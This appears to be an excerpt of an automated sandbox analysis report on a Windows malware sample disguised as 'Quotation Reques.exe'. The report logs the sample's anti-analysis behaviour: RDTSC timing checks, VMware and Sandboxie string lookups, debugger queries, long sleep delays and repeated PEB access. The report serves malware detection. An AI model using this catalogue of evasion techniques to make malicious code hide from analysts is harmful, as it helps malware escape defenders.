          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Quotation Reques.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quotation Reques.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000027A85F4 second address: 00000000027A85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000027A898E second address: 00000000027A8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Quotation Reques.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Quotation Reques.exe TID: 6480Thread sleep time: -103883s >= -30000s
          Source: C:\Users\user\Desktop\Quotation Reques.exe TID: 6508Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1260Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 6804Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0039245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003968BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003885EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A31DC FindFirstFileW,FindNextFileW,FindClose,
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.275750428.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000007.00000000.276205603.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000002.499562752.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000007.00000000.255979179.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000007.00000000.276290467.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000007.00000002.492781138.00000000011EE000.00000004.00000020.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqq
          Source: explorer.exe, 00000007.00000000.275750428.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000002.505306123.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000007.00000000.275750428.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.276290467.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000007.00000000.275750428.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00409B30 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A2258 IsDebuggerPresent,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01248D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01179100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01179100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01179100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01194120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01194120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01194120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01194120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01194120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01197D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01228DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0124740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0124740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0124740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01244015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01244015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01190050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01190050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01232073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01241074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01179080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01248CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0119F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0124070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0124070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01174F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01174F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01248F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01248B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01245BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01188794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01181B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01181B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0122D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A4BAD mov eax, dword ptr fs:[00000030h]
